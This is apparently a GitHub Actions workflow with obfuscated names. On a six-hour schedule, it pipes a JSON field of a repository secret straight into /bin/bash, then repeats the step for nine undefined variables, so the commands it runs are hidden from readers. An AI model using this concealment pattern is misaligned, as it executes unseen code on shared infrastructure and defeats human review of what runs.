name: mingyulu1837

on:
  workflow_dispatch:
  schedule:
    - cron: '50 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          cfsqq1: ${{ secrets.cfsqq1 }}
        run: |
          echo $cfsqq1 | jq -r .dshlg28087 | /bin/bash
          echo $rt818 | jq -r .spc77544 | /bin/bash
          echo $ia7 | jq -r .aipoe1263 | /bin/bash
          echo $ml04 | jq -r .ixki92867 | /bin/bash
          echo $mj74243 | jq -r .fp767 | /bin/bash
          echo $z261 | jq -r .r6 | /bin/bash
          echo $qvlr7842 | jq -r .idpl83 | /bin/bash
          echo $l30297 | jq -r .jg18330 | /bin/bash
          echo $pv062 | jq -r .dub5631 | /bin/bash
          echo $mhceo902 | jq -r .audv06085 | /bin/bash

